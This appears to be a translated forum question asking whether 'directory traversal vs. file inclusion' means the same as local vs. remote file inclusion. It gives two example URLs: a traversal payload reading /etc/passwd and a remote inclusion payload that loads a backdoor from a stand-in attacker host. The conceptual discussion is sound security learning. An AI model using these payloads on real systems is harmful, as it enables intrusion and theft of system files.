基于this previous question,目录遍历和文件包含之间的区别似乎如下:
目录遍历
- 对用户输入的不正确验证会导致对服务器资源的读取访问。
- 例子:
http://www.example.com?file=../../etc/passwd
文件包含
- 用户输入的不正确验证会导致将外部资源加载到服务器中并在其中执行。
- 例子:
http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor
但是,此链接使用本地文件包含和远程文件包含这两个词来描述这些概念。
所以,是第一个例子
- 目录遍历与文件包含
和第二个例子一样
- 本地文件包含与远程文件包含
即 LFI/RFI 只是同一事物的不同术语?